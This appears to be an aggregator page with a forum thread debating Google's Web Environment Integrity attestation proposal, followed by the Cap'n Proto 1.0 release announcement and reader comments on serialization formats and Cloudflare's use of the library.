You're using it wrong. SafetyNet is able to assert that the build the device asserts is what it claims. After you know that, it's up to you to decide whether you trust communications from that build or not. If it's a known-insecure build, you can say that you don't. SafetyNet cannot assert that a third party ROM is what it claims to be, so you have to decide whether you trust communications from that device or not based on not knowing at all what build is on the device.
Exactly! Ironically it's a possible reduction in security on custom roms as well if one chooses to bypass it, which is trivial, but requires rooting the device.
This kinda seems like a fantastic way to implement micro payments. The site owner sets up a attestor that knows they've paid.
I hate Wei in general, but it really could open up control over bots and paid access.
Are you aware of any websites that have tried to implement payments, but failed or chose not to because they couldn't verify which users have paid? It's an incredibly easy problem to solve without WEI.
There is no reason that can't be done with existing web technology, WEI does not advance that use case in any meaningful way.
The Internet in general, programmers especially, and the Web community especially especially owe Google a massive debt of gratitude for all they've done over the years.
But this one's simple: "literally go fuck yourself with this. we will fight you tooth and fucking nail every fucking angstrom on this one. it's a bridge too far.".
Why are we in debt to them? Google has become stinking rich from everything that they've done. That's payment enough.
There is zero point debating this in technical detail because the proposal itself is evil. Don't get distracted by tone policing and how they scream you must be civil and whatnot.
Our best hope is kicking up a huge fuss so legislators and media will notice, so Google will be under pressure. It won't make them cancel the feature but don't forget to remember that they aren't above anti-trust law. There is a significant chance that some competition authority will step in if the issue doesn't die down. Our job is to make sure it won't be forgotten really quickly.
> It won't make them cancel the feature but don't forget to remember that they aren't above anti-trust law.
They can buy government many times over with their vast resources. This may be too late for that. What ideally should happen is that corporations this big should be split until each of the new entities meet the definition of SME. That's what is broken in the current iteration of capitalism. There is no real competition any more, so it no longer works.
I can see it being useful to have a feature which could validate if another user on a website is a human. e.g: on reddit or twitter, the user you're talking to has a little checkmark (not the blue checkmark) next to their name if they've been WEI validated. Rather than refusing to let a user use the platform, just letting other users know that the person you're talking to isn't a bot
Yes, we need to protest. And I don't mean protest by slamming Google's github repositories with comments. That's not a protest. Go tell the media. Go tell your elected officials.
I also think web developers getting together like we did with SOPA/PIPA and raising awareness on our web properties can also help. How do we organize that?
'This website is not compatible with your device'
I can see this show up on Youtube (why not - under Google's control, and they want you to watch the ads on their official browser) and on banking apps. Initially. In the longer run, it either withers and dies, or it leads to antitrust action. I really can't see another way.
Actually, absent a full chain-of-trust from boot, which I believe Android/iOS do provide, and possibly the proprietary desktop environments can provide, it should be possible to fake the 'I'm a legitimate browser' exchange. Which is what the 1% that care will do. But it sucks to have to go to deep underground 'crack' type stuff where before there was an open web. Not to mention the risk of getting hit by the banhammer if detected.
This will probably be implemented by every streaming service very quickly to try to prevent piracy (which won't work), and will only end up harming people who just want to watch on more freedom-respecting browsers or operating systems
Banks are not the target of this. If Banks do something that inhibits people with disabilities, corporate account managers with disabilities, or senior citizens, they will get skewered. They will tread carefully.
I'm curious to hear from someone familiar with web development: How much do websites invest in accessibility and related features that cater to a small audience? Can we draw any conclusions from this to how websites will deal with accessibility to non attested users?
Depends on the company size, really.
Large companies will invest significant resources with us to achieve AAA compliance with WCAG 2.1
Smaller companies will spend SOME additional budget to achieve AA.
Tiny companies will spend nothing until they get a demand letter.
I agree that extending trusted platform trust all the way up into web APIs is gross — it would be fine if the TPA club was wide open to anyone building their own OS, but that clearly will never happen and only the corporate-aligned cabal will ever be trusted, and all the free/open OSs will never be allowed to join.
But... is there scope for the attestor in WEI to be a third party site that does a super fancy "click on all the stop lights / stairs / boats" captcha, and then repurposes that captcha result for every other site? That doesn't sound like an awful service to add to the web. It would mean each individual site no longer had to do their own captcha.
(Probably impossible without third party cookies. But then that kind of implies that if WEI does make it possible then it could be shown to provide a tracking service equivalent to third party cookies? Again, gross.)
I agree, I think a third party attribution service makes a lot of sense, similar to how https has trusted CAs there could be different trusted attributors that can verify that a user has some account with some kind of verification, and these pluggable attributors could then be trusted by sites. You'd still need to integrate with a trusted authenticator, which some people might find objectionable, but it's probably better than the current proposal in that regard.
This of course only covers half of the use cases discussed (the half about preventing bots, not to say anything about the more DRM-ey aspects).
It didn't scare me at all. As Google moves away from the open web, the open web also moves away from them.
A concern is that websites vital to people's lives, such as banks and government services, will adopt this to mimic the control they have on mobile platforms. With few brick-and-mortar branches remaining, it leaves few options open.
Why does everything need to be secure now?
I can understand shopping. And reporters of hot news. But why everything?
Why does my http site, which has nothing important on it at all, get flagged by chrome as 'insecure'?
This strikes me as a bunch of bs.
>Why does everything need to be secure now?
>I can understand shopping. And reporters of hot news. But why everything?
So Google can capture more ad revenue by refusing to 'attest' clients who run ad blockers?
And so other attestors can dictate the 'approved' software that can be used.
What could go wrong? /s
The usual argument is that vanilla HTTP makes it possible for a man-in-the-middle (your ISP, presumably?) to tamper with data payloads before they're delivered.
Requiring HTTPS means you require clients to have up-to-date TLS certificates and implementations. This provides a ratchet that slowly makes it harder and harder to use old computers and old software to access the web. Forced obsolescence and churn is highly desirable for anybody who controls the new standards, including Google.
> Why does my http site, which has nothing important on it at all, get flagged by chrome as 'insecure'?
Because an attacker can inject JavaScript code on it, and use it to attack other sites. The most famous example of that is 'Great Cannon', which used a MITM attack on http sites to inject JavaScript code which did a distributed denial of service attack on GitHub. Other possibilities include injecting code which uses a browser vulnerability to install malware on the computer of whoever accesses your site (a 'watering hole' attack), without having to invade your site first.
It's insecure because someone on path (or actually off-path but harder) could replace the contents of your website with whatever they want, including taking payments 'on your behalf' and then just pocketing them. The main original point of HTTPS, and why I assume it does not use starttls or similar, is so people in the late 1990s and early 2000s could figure out what websites they were allowed to put their credit card numbers into.
> Can we just refuse to implement it?
> Unfortunately, it's not that simple this time. Any browser choosing not to implement this would not be trusted and any website choosing to use this API could therefore reject users from those browsers. Google also has ways to drive adoptions by websites themselves.
This is true of any contentious browser feature. Choosing not to implement it means your users will sometimes be presented with a worse UX if a website's developers decide to require that feature.But as a software creator, it's up to you to determine what is best for your customers. If your only hope of not going along with this is having the EU come in and slapping Google's wrist, I'm concerned that you aren't willing to take a hard stance on your own.
Google can just down-rank sites that don't implement this API. Voila, full adoption across the entire web and unapproved browsers are shut out.
> This is true of any contentious browser feature.
Makes me recall Flash.
Once was a time when very large parts of the web were dark to me because I would not install Flash
Not an exact comparison, but we've been (near) here beforehand
Well hold on. The problem with attestation is you're damned if you do and damned if you don't.
If you use a browser which supports attestation you will be denied service by companies who disapprove of what you run on your computer.
If you don't use a browser which supports attestation you will be denied service by companies who disapprove of what you run on your computer.
So everyone loses. If this goes live everyone in the world loses.
It is an utterly heinous proposal. It is perhaps the worst thing Google has ever produced. I use Firefox and will never use any browser that implements attestation, even if I have to stop using most of the WWW one day.
But unfortunately individual action is not going to be enough here, because no matter what you do, you lose.
This change is about what's best for advertisers and publishers, not customers.
This point in the blog post saddens me. Chrome's market share is huge, but Chrome is not ubiquitous. There was public outcry when Google was suspected of making youtube have 'bugs' on non-Chromium browsers - having them just straight up disable services for more than a third of users would result in an actual shitstorm, more than any of us could hope to drum up with an explanation of why this change is bad.
It would also drive the point home to the very same legislators that the author is deferring to.
If browsers now start pre-emptively folding, Google just straight up won. It's great that the Vivaldi team is against this change, but a blog post and hoping for regulation just won't cut it. You have actual leverage here, use it.
> If your only hope of not going along with this is having the EU come in and slapping Google's wrist, I'm concerned that you aren't willing to take a hard stance on your own.
I take umbridge at this implication. When a monopoly like Google takes anti-competitive actions it's not fair or just to expect individuals to stand up to it. Governments exist to counter anti-competitive behavior like this and governments have been doing a terrible job chopping down companies with too much vertical integration lately.
Since Google also controls the most popular search engine and ad network, they can exert very significant pressure on web developers by refusing to place ads or drive traffic to websites that don't comply.
I already block all ads so I'm obviously not totally sympathetic to developers who make decisions based on what will maximize ad revenue, but it still is not fair to put the burden on developers here and say 'it's your choice, just say no'.
Can't they just return random number for attestation each time.
Google has been beat-down before trying to do these kinds of things. 2 ones I can think of:
1) FLoC: https://www.theverge.com/2022/1/25/22900567/google-floc-aban...
2) Dart: Google wanted this to replace javascript, but Mozilla and MS both said no way, as they had no part in it. So that project ended up dying.
Google tries lots of things. Mozilla, MS, and Apple are still strong enough (especially outside the US) to push back on things that they think are a bad idea.
> Choosing not to implement it means your users will sometimes be presented with a worse UX if a website's developers decide to require that feature.
I think this makes a category error. Most browser features/APIs are indeed treated as progressive enhancements by web developers, at least until an overwhelming number of the users have access to that feature. And even then, even if the developer makes assumptions that the feature/API is present, often the result is a degraded experience rather than an all-out broken experience.
The same is not true of web attestation. If a website requires it and a browser refuses to implement it, in at least some cases (probably a concerningly high number of cases though) the result will be that the user is entirely locked out of using that website.
It's also worth noting that _even if_ Vivaldi implements WEI, there's a solid chance that the attestation authority (Google, Microsoft, Apple) or possibly the website itself[1] will not accept it as a valid environment at all! After all, what makes Vivaldi not a 'malicious or automated environment' in their eyes? What if Vivaldi allows full ad blocking extensions? User automation/scripting? Or any example of too much freedom to the user. Will the attestation authority decide that it is not worthy of being an acceptable environment?
[1] if this ends up spiralling out of control by allowing the full attestation chain to be inspected by the website
>But as a software creator, it's up to you to determine what is best for your customers.
Absolutely zero large web properties do anything based on what's best for users. If this gains traction, Google will simply deny adsense payments for impressions from an 'untrusted' page, and thus all the large players that show ads for revenue will immediately implement WEI without giving a single flying shit about the users, as they always have and always will.
The author should have asked 'Can we just implement it then?' because in some cases you literally can't implement the proposed API. That's the core issue with it. Unlike other contentious browser features, even if you wanted to implement attestation, it may be impossible to do so. More precisely, attestation may be impossible to implement on some platforms to the de facto standard that would develop over time. The de facto standard I refer to is the list of attestors web servers will accept. If your platform can't be attested by an approved attestor, you're screwed. That's why it's not that simple this time. The proposed attestation API is literally unimplementable in general. You can't implement it and you can't not implement it.
> If your only hope of not going along with this is having the EU come in and slapping Google's wrist, I'm concerned that you aren't willing to take a hard stance on your own.
This is indeed concerning. I'd like to see Brave's response to this, and we already know how Firefox has responded.
Someone argued yesterday that in instances like this users are choosing what to use of their own free will. At the micro scale sure, at the macro scale I disagree. Users want their shit to work and if you play these shenanigans it's less of a choice and more of a ransom.
Insects in a swarm can choose where to go but they can't choose where the swarm goes.
What sets WEI apart is that it, in a way, exerts power over your choice on how to implement other web features, for example whether you're allowed to block elements, or even just show a developer console.
Other than Encrypted Media Extensions (and these are much more constrained than WEI!), I don't know of any other web standard that does that.
Would this end up breaking curl, or any other tool that accesses https?
It will, but curl and others will likely simply be upgraded with a puppeteer of sorts that plugs into your chrome runtime. So this will have prevented nothing (except force not technical users to adopt chrome and thus kill all new browser incumbents, offering the chance to force feed even more google ads)
Yes and no.
The attestation API will allow websites to verify certain things about the user agent which they then may use to either deny access or alter the access for the requested resource. This is similar to existing methods of checking the 'User-Agent' header string but is much more robust to tampering because it can rely on a full-chain of trust from the owning website.
So will existing tools work with this?
Websites that do not require attestation should work fine. This will probably be the vast majority of websites.
Websites that require attestation may or may not work depending on the results of the attestation. Since programs like curl do not currently provide a mechanism to perform attestation, they will indicate a failure. If the website is configured to disallow failed attestation attempts, then tools like curl will no longer be able to access the same resources that user agents that pass attestation can.
My opinion is that it is likely that attestation will be used for any website where there is a large media presence (copyright/drm), large data presence (resource utilization/streams), high security, or any large company that is willing to completely segment its web resources into attested and non-attested versions. Tools like curl will no longer work with these sites until either a suitable attestation system is added to them, or the company changes its attestation policy.
It's the insane power that companies like Google, Microsoft, and Apple hold over the tech world. It's like they can just dictate everything to suit their own interests, and it's the users who end up losing out.
Remember when Apple killed Flash? I heard it was because they wanted people to use their app store more instead of us playing games in the browser, so they could make more money. And Microsoft installing IE and setting it as the default browser? And now, Google is making changes to how we browse the web and adding things like Manifest v3, to boost their ad business.
The most irritating part is it is always gets packaged as being for our safety. The sad thing is I've often seen people even drink this user safety kool-aid, especially with Apple (like restricting browser choices on mobile - not sure if it's changed now).
I really think there should be some laws in place to prevent this kind of behavior. It's not fair to us, the users and we can't just rely on the EU to do it all the time.
> Remember when Apple killed Flash? I heard it was because they wanted people to use their app store more instead of us playing games in the browser, so they could make more money.
Even without the incentive of "moar profit$" they never entertained Flash because fundamentally, it sucked. When it landed in Android, it was a bloated mess that sucked the battery dry and was slow as molasses. On every platform it existed on, it was a usability and security nightmare. No, Apple "killed" Flash by making a sane decision not to allow it in their fledgling platform because Flash outright sucked, informed largely by the abhorrent performance on all platforms.
> And Microsoft installing IE and setting it as the default browser?
SMH. There was never an issue with Microsoft providing IE as a default initially - that came later with the EU. The biggest issue was that if an OEM (a Dell or an HP) struck a deal with Netscape to provide that as default, Microsoft threatened to remove the OEMs license to distribute Windows. In the late '90s and early '00s that would have been the death knell of an OEM. And that is the anti-trust part. They abused the position as the number 1 desktop os ( by a significant margin) to take control of the then nascent browser market.
> Remember when Apple killed Flash? I heard it was because they wanted people to use their app store more instead of us playing games in the browser, so they could make more money
The original iPhone which killed flash didn't even ship with the App Store. They assumed we'd only be using web apps.
It's in the original Steve Jobs presentation when he announced the iPhone.
> Remember when Apple killed Flash?
Yes. Every SECOPS person let out a collective sigh of relief when the weekly p0 patches for flash stopped coming. Apple may have been trying to push towards 'native' apps but that was almost certainly secondary; safari was leading the way on html5 APIs.
Let's not pretend that the death of Flash was a tragedy.
How exactly is WEI any worse than say a peep-hole on a door? At the end of the day bots are a huge problem and it's only getting worse. What's the alternative solution? You need to know who you're dealing with, both in life and clearly on the web.
I'm probably alone in this, but WEI is a good thing. Anyone who's run a site knows the headache around bots. Sites that don't care about bots can simply not use WEI. Of course, we know they will use it, because bots are a headache. Millions of engineer hours are wasted yearly on bot nonsense.
With the improvements in AI this was inevitable anyway. Anyone who thinks otherwise is delusional. Reap what you sow and what not.
edit: removing ssl comparison since it's not really my point to begin with
SSL is in practice only used for server certificates. It was kinda shit and a lot of people complained because of CAs but then we got let's encrypt etc which alleviated the situation. And the identity is only tied to domain control, unlike eg code signing certs which are orders of magnitude more invasive and frankly a racket.
In either case, WEI has the potential to be proper DRM, like in the "approved devices" fashion. It's deeply invasive, and can be used to exclude any type of usage at the whim of mega corps, like screen readers, ad blocking, anti-tracking/fingerprinting, downloading copyrighted content, and anything new they can think of in the future. It's quite literally the gateway to making the web an App Store (or at best, multiple app stores).
> What's the alternative solution?
To what problem? Bots specifically or humans who want to use the web in any way they want?
If bots, then elaborate. Many bots are good, and ironically the vast majority of bot traffic comes from the very corporations that are behind this stuff. As for the really bad bots, we have IP blocklisting. For the gray/manipulative bots, sure, that's a problem. What makes you think that problem needs to be addressed with mandatory handcuffs for everyone else?
WEI is really about denying the user full control of their own device. If you give people full control of their devices, you will have bots. Do you believe eliminating bots is more important than general purpose computing?
A bot is just some computer doing what its owner wants. OP is happy because WEI will eliminate bots. OP is inconvenienced by other people using computers in ways they don't like, and wants to take control of the computer away.
As strong AI is knocking on the door, we see people wanting to take general purpose computing away. All the worst outcomes involve people losing the ability to control their own computers.
WEI is like requiring people to get their brain scanned before you let them visit your house. 'Sorry, I require a valid attestation from Google that you are a real human,' you say. Your friend now needs to drive down to the local Google® Privacy Invasion CenterTM and have all of their personal secrets exposed so Google can prove they are, in fact, not a robot. Except, oh no, Google found Linux in their brain scan! The horror! How dare they value their own freedom! Anyone who opposes spying from Chrome and/or Google Play Services is obviously a bot. Nothing to hide, nothing to fear, right? Your visitor, who is clearly not a bot, fails to obtain a valid attestation from Google. You deny them entry to your house.
You have lost an acquaintance.
SSL doesn't demand that some third party approve your software and hardware in order for it to work for you.
WEI and SSL/TLS are completely different.
TLS does not facilitate preventing you as a web site visitor from inspecting or modifying the web content served over it, e.g. by blocking ads or auto-playing videos. WEI does.
TLS* does not allow websites to restrict users from using the tech stack (hardware, OS, browser) that they want to use. This does.
SSL is the client verifying the server, and the client can thusly opt to skip or alter that in any way it sees fit. WEI is the reverse: the server validating the client, so the client has no choice to opt-out.
WEI won't even stop the bad bots. They will simply use 'legitimate' devices.
Yeah, sure, let's implement this dystopian nightmare technology to solve our little engineering problem.
> Anyone who's run a site knows the headache around bots. Sites that don't care about bots can simply not use WEI.
So is it a headache for all/most sites or is it not?
How would this prevent bots? It's very easy to set up a bot that's running Chrome on Android, or whatever environment is required. Bots can do whatever you tell them without complaining. This only prevents actual humans who want to use a non-mainstream browser, or use add-ons to help them browse, or use a non-mainstream operating system or device.
Anyone using a browser without this feature will end up becoming second class citizens who must jump through (extreme) hoops to use the web...
Or they're just walled off from most of the web entirely.
I use a variety of personally developed web scraper scripts. For instance, I have digital copies of every paystub. These will almost all become worthless. My retirement plan at a previous employer would not let me download monthly statements unless I did it manually... it was able to detect the Mechanize library, and responded with some creepy-assed warning against robots.
No one would go to the trouble to do that manually every month, and no one was allowed robots apparently. But at least they needed to install some specialty software somewhere to disallow it. This shit will just make it even easier for the assholes.
I also worry about tools I sometimes use for things like Selenium.
This isn't SSL.
Bots will get sophisticated.
This all seems to me that in a decade we'll be having the same discussion, with the same excuse, but eventually the proposal from big corporations will be to require plugging-in a government-issued ID card into a smartcard reader in order to access pre-approved websites with pre-approved client portals running in pre-approved machines.
WEI doesn't prevent bots. Bots would just need to script an attested browser via tools like AutoHotKey -- the only way WEI would prevent bots would be by preventing you from running the browser on an operating system without 3rd party software installed. WEI is a 2 or 3 month roadbump for bot builders.
WEI does prevent any customization.
I think your comparison to SSL is actually important, because encryption is a discrete problem with a discrete solution. But this WEI proposal is designed to detect botting, which is a cat and mouse problem without a clear end game.
> It is also interesting to note that the first use case listed is about ensuring that interactions with ads are genuine.
That's just the beginning. Attestation will eventually allow advertisers to demand that user is present and looking at the screen like in Black Mirror episode Fifteen Million Merits.
Sony already owns a patent on that exact scenario from Black Mirror.
https://www.creativebloq.com/sony-tv-patent
> In it, TV viewers are only able to skip an advert by shouting the name of the brand. Yep, crying 'McDonald's!' is the only way to make the Big Mac disappear.
Companies will do the most insane, terrible things if not stopped. This will happen.
Can't wait till we've added another turtle to the stack with a full browser engine implemented in WASM running in a host browser that is mandatory for all media sites.
On android, some video ads will even pause if you pull down the notification bar.
There's a lot of moral outrage regarding this proposal, rightfully so. In fact, it should be further intensified. But apart from that, I don't think this proposal will work in any case.
When implemented without holdouts (closed loop), you do have a tight DRM web, which will attract legislators. Or so we hope.
When implemented with holdouts, it's barely useful to websites since they still need the backup mechanisms to detect fraud that they have anyway. If they need to keep it around, might as well use that as singular solution which has the added 'benefit' of collecting way more personal data.
>it's barely useful to websites since they still need the backup mechanisms to detect fraud that they have anyway.
Remember, this was never for individual websites. It's strictly a measure to protect Google's ad business.
How about adding a fair rule to standard, that attester cannot attest their own products? I wonder how long would it take for Microsoft or Apple to attest google.com as trustworthy website?
The attestation is about the device, not the website.
I think just from a security perspective it makes most sense for the device or os manufacturer to handle attestation for that device.
719 points 4 days ago by kentonv in 1939th position
capnproto.org | Estimated reading time – 10 minutes | comments | anchor
kentonv on 28 Jul 2023
It's been a little over ten years since the first release of Cap'n Proto, on April 1, 2013. Today I'm releasing version 1.0 of Cap'n Proto's C++ reference implementation.
Don't get too excited! There's not actually much new. Frankly, I should have declared 1.0 a long time ago – probably around version 0.6 (in 2017) or maybe even 0.5 (in 2014). I didn't mostly because there were a few advanced features (like three-party handoff, or shared-memory RPC) that I always felt like I wanted to finish before 1.0, but they just kept not reaching the top of my priority list. But the reality is that Cap'n Proto has been relied upon in production for a long time. In fact, you are using Cap'n Proto right now, to view this site, which is served by Cloudflare, which uses Cap'n Proto extensively (and is also my employer, although they used Cap'n Proto before they hired me). Cap'n Proto is used to encode millions (maybe billions) of messages and gigabits (maybe terabits) of data every single second of every day. As for those still-missing features, the real world has seemingly proven that they aren't actually that important. (I still do want to complete them though.)
Ironically, the thing that finally motivated the 1.0 release is so that we can start working on 2.0. But again here, don't get too excited! Cap'n Proto 2.0 is not slated to be a revolutionary change. Rather, there are a number of changes we (the Cloudflare Workers team) would like to make to Cap'n Proto's C++ API, and its companion, the KJ C++ toolkit library. Over the ten years these libraries have been available, I have kept their APIs pretty stable, despite being 0.x versioned. But for 2.0, we want to make some sweeping backwards-incompatible changes, in order to fix some footguns and improve developer experience for those on our team.
Some users probably won't want to keep up with these changes. Hence, I'm releasing 1.0 now as a sort of "long-term support" release. We'll backport bugfixes as appropriate to the 1.0 branch for the long term, so that people who aren't interested in changes can just stick with it.
Again, not a whole lot has changed since the last version, 0.10. But there are a few things worth mentioning:
A number of optimizations were made to improve performance of Cap'n Proto RPC. These include reducing the amount of memory allocation done by the RPC implementation and KJ I/O framework, adding the ability to elide certain messages from the RPC protocol to reduce traffic, and doing better buffering of small messages that are sent and received together to reduce syscalls. These are incremental improvements.
Breaking change: Previously, servers could opt into allowing RPC cancellation by calling context.allowCancellation()
after a call was delivered. In 1.0, opting into cancellation is instead accomplished using an annotation on the schema (the allowCancellation
annotation defined in c++.capnp
). We made this change after observing that in practice, we almost always wanted to allow cancellation, but we almost always forgot to do so. The schema-level annotation can be set on a whole file at a time, which is easier not to forget. Moreover, the dynamic opt-in required a lot of bookkeeping that had a noticeable performance impact in practice; switching to the annotation provided a performance boost. For users that never used context.allowCancellation()
in the first place, there's no need to change anything when upgrading to 1.0 – cancellation is still disallowed by default. (If you are affected, you will see a compile error. If there's no compile error, you have nothing to worry about.)
KJ now uses kqueue()
to handle asynchronous I/O on systems that have it (MacOS and BSD derivatives). KJ has historically always used epoll
on Linux, but until now had used a slower poll()
-based approach on other Unix-like platforms.
KJ's HTTP client and server implementations now support the CONNECT
method.
A new class capnp::RevocableServer
was introduced to assist in exporting RPC wrappers around objects whose lifetimes are not controlled by the wrapper. Previously, avoiding use-after-free bugs in such scenarios was tricky.
Many, many smaller bug fixes and improvements. See the PR history for details.
The changes we have in mind for version 2.0 of Cap'n Proto's C++ implementation are mostly NOT related to the protocol itself, but rather to the C++ API and especially to KJ, the C++ toolkit library that comes with Cap'n Proto. These changes are motivated by our experience building a large codebase on top of KJ: namely, the Cloudflare Workers runtime, workerd
.
KJ is a C++ toolkit library, arguably comparable to things like Boost, Google's Abseil, or Facebook's Folly. I started building KJ at the same time as Cap'n Proto in 2013, at a time when C++11 was very new and most libraries were not really designing around it yet. The intent was never to create a new standard library, but rather to address specific needs I had at the time. But over many years, I ended up building a lot of stuff. By the time I joined Cloudflare and started the Workers Runtime, KJ already featured a powerful async I/O framework, HTTP implementation, TLS bindings, and more.
Of course, KJ has nowhere near as much stuff as Boost or Abseil, and nowhere near as much engineering effort behind it. You might argue, therefore, that it would have been better to choose one of those libraries to build on. However, KJ had a huge advantage: that we own it, and can shape it to fit our specific needs, without having to fight with anyone to get those changes upstreamed.
One example among many: KJ's HTTP implementation features the ability to "suspend" the state of an HTTP connection, after receiving headers, and transfer it to a different thread or process to be resumed. This is an unusual thing to want, but is something we needed for resource management in the Workers Runtime. Implementing this required some deep surgery in KJ HTTP and definitely adds complexity. If we had been using someone else's HTTP library, would they have let us upstream such a change?
That said, even though we own KJ, we've still tried to avoid making any change that breaks third-party users, and this has held back some changes that would probably benefit Cloudflare Workers. We have therefore decided to "fork" it. Version 2.0 is that fork.
Development of version 2.0 will take place on Cap'n Proto's new v2
branch. The master
branch will become the 1.0 LTS branch, so that existing projects which track master
are not disrupted by our changes.
We don't yet know all the changes we want to make as we've only just started thinking seriously about it. But, here's some ideas we've had so far:
We will require a compiler with support for C++20, or maybe even C++23. Cap'n Proto 1.0 only requires C++14.
In particular, we will require a compiler that supports C++20 coroutines, as lots of KJ async code will be refactored to rely on coroutines. This should both make the code clearer and improve performance by reducing memory allocations. However, coroutine support is still spotty – as of this writing, GCC seems to ICE on KJ's coroutine implementation.
Cap'n Proto's RPC API, KJ's HTTP APIs, and others are likely to be revised to make them more coroutine-friendly.
kj::Maybe
will become more ergonomic. It will no longer overload nullptr
to represent the absence of a value; we will introduce kj::none
instead. KJ_IF_MAYBE
will no longer produce a pointer, but instead a reference (a trick that becomes possible by utilizing C++17 features).
We will drop support for compiling with exceptions disabled. KJ's coding style uses exceptions as a form of software fault isolation, or "catchable panics", such that errors can cause the "current task" to fail out without disrupting other tasks running concurrently. In practice, this ends up affecting every part of how KJ-style code is written. And yet, since the beginning, KJ and Cap'n Proto have been designed to accommodate environments where exceptions are turned off at compile time, using an elaborate system to fall back to callbacks and distinguish between fatal and non-fatal exceptions. In practice, maintaining this ability has been a drag on development – no-exceptions mode is constantly broken and must be tediously fixed before each release. Even when the tests are passing, it's likely that a lot of KJ's functionality realistically cannot be used in no-exceptions mode due to bugs and fragility. Today, I would strongly recommend against anyone using this mode except maybe for the most basic use of Cap'n Proto's serialization layer. Meanwhile, though, I'm honestly not sure if anyone uses this mode at all! In theory I would expect many people do, since many people choose to use C++ with exceptions disabled, but I've never actually received a single question or bug report related to it. It seems very likely that this was wasted effort all along. By removing support, we can simplify a lot of stuff and probably do releases more frequently going forward.
Similarly, we'll drop support for no-RTTI mode and other exotic modes that are a maintenance burden.
We may revise KJ's approach to reference counting, as the current design has proven to be unintuitive to many users.
We will fix a longstanding design flaw in kj::AsyncOutputStream
, where EOF is currently signaled by destroying the stream. Instead, we'll add an explicit end()
method that returns a Promise. Destroying the stream without calling end()
will signal an erroneous disconnect. (There are several other aesthetic improvements I'd like to make to the KJ stream APIs as well.)
We may want to redesign several core I/O APIs to be a better fit for Linux's new-ish io_uring event notification paradigm.
The RPC implementation may switch to allowing cancellation by default. As discussed above, this is opt-in today, but in practice I find it's almost always desirable, and disallowing it can lead to subtle problems.
And so on.
It's worth noting that at present, there is no plan to make any backwards-incompatible changes to the serialization format or RPC protocol. The changes being discussed only affect the C++ API. Applications written in other languages are completely unaffected by all this.
It's likely that a formal 2.0 release will not happen for some time – probably a few years. I want to make sure we get through all the really big breaking changes we want to make, before we inflict update pain on most users. Of course, if you're willing to accept breakages, you can always track the v2
branch. Cloudflare Workers releases from v2
twice a week, so it should always be in good working order.
For context: Kenton ran Google's in house proto system for many years, before leaving and building his own open source version.
I know this isn't new, but I wonder if the name is an intentional nod to Star Trek Voyager or is there another reference I'm not aware of.
Given that it's billed as a 'cerealization protocol', I always assumed it was a reference to Cap'n Crunch cereal.
Huh, that reference actually never occurred to me.
The name Cap'n Proto actually originally meant 'Capabilities and Protobufs' -- it was a capability-based RPC protocol based on Protocol Buffers. However, early on I decided I wanted to try a whole different serialization format instead. 'Proto' still makes sense, since it is a protocol, so I kept the name.
The pun 'cerealization protocol' is actually something someone else had to point out to me, but I promptly added it to the logo. :)
If any cloudflare employees end up here who helped decide on Capn Proto over other stuff (e.g. protobuf), what considerations went into that choice? I'm curious if the reasons will be things important to me, or things that you don't need to worry about unless you deal with huge scale.
I don't work at Cloudflare but follow their work and occasionally work on performance sensitive projects.
If I had to guess, they looked at the landscape a bit like I do and regarded Cap'n Proto, flatbuffers, SBE, etc. as being in one category apart from other data formats like Avro, protobuf, and the like.
So once you're committed to record'ish shaped (rather than columnar like Parquet) data that has an upfront parse time of zero (nominally, there could be marshalling if you transmogrify the field values on read), the list gets pretty short.
https://capnproto.org/news/2014-06-17-capnproto-flatbuffers-... goes into some of the trade-offs here.
Cap'n Proto was originally made for https://sandstorm.io/. That work (which Kenton has presumably done at Cloudflare since he's been employed there) eventually turned into Cloudflare workers.
Another consideration: https://github.com/google/flatbuffers/issues/2#issuecomment-...
To summarize something from a little over a year after I joined there: Cloudflare was building out a way to ship logs from its edge to a central point for customer analytics and serving logs to enterprise customers. As I understood it, the primary engineer who built all of that out, Albert Strasheim, benchmarked the most likely serialization options available and found Cap'n Proto to be appreciably faster than protobuf. It had a great C++ implementation (which we could use from nginx, IIRC with some lua involved) and while the Go implementation, which we used on the consuming side, had its warts, folks were able to fix the key parts that needed attention.
Anyway. Cloudflare's always been pretty cost efficient machine wise, so it was a natural choice given the performance needs we had. In my time in the data team there, Cap'n Proto was always pretty easy to work with, and sharing proto definitions from a central schema repo worked pretty well, too. Thanks for your work, Kenton!
Here's a blog post about Cloudflare's use of Cap'n Proto in 2014, three years before I joined: https://blog.cloudflare.com/introducing-lua-capnproto-better...
To this day, Cloudflare's data pipeline (which produces logs and analytics from the edge) is largely based on Cap'n Proto serialization. I haven't personally been much involved with that project.
As for Cloudflare Workers, of course, I started the project, so I used my stuff. Probably not the justification you're looking for. :)
That said, I would argue the extreme expressiveness of Cap'n Proto's RPC protocol compared to alternatives has been a big help in implementing sandboxing in the Workers Runtime, as well as distributed systems features like Durable Objects. https://blog.cloudflare.com/introducing-workers-durable-obje...
The lead dev of Cloudflare workers is the creator of Cap'n Proto so that likely made it an easy choice
Congrats in 10 years! Question: Can Cap'n Proto be used as an alternative to Python Pickle library for serializing and de-serializing python object structures?
If your goal is to serialize an arbitrary Python object, Pickle is the way to go. Cap'n Proto requires you to define a schema, in Cap'n Proto schema language, for whatever you wan to serialize. It can't just take an arbitrary Python value.
Great achievement. To be honest I wouldn't recommend Capnp. The C++ API is very awkward.
The zero copy parsing is less of a benefit than you'd expect - pretty unlikely you're going to want to keep your data as a Capnp data structure because of how awkward it is to use. 99% of the time you'll just copy it into your own data structures anyway.
There's also more friction with the rest of the world which has more or less settled on Protobuf as the most popular binary implementation of this sort of idea.
I only used it for serialisation. Maybe the RPC stuff is more compelling.
I really wish Thrift had taken off instead of Protobuf/gRPC. It was so much better designed and more flexible than anything I've seen before or since. I think it died mainly due to terrible documentation. I guess it also didn't have a big name behind it.
I find MessagePack to be pretty great if you don't need schema. JSON serialization is unreasonably fast in V8 though and even message pack can't beat it; though it's often faster in other languages and saves on bytes.
I do agree that the API required for zero-copy turns out a bit awkward, particularly on the writing side. The reading side doesn't look much different. Meanwhile zero-copy is really only a paradigm shift in certain scenarios, like when used with mmap(). For network communications it doesn't change much unless you are doing something hardcore like RDMA. I've always wanted to add an optional alternative API to Cap'n Proto that uses 'plain old C structures' (or something close to it) with one-copy serialization (just like protobuf) for the use cases where zero-copy doesn't really matter. But haven't gotten around to it yet...
That said I personally have always been much more excited about the RPC protocol than the serialization. I think the RPC protocol is actually a paradigm shift for almost any non-trivial use case.
You mean flatbuffers, not protobuf.
It has established itself as the de-facto standard, with a few other places using SBE instead.
In any case the main problems with binary serialization are:
- schemas and message version management
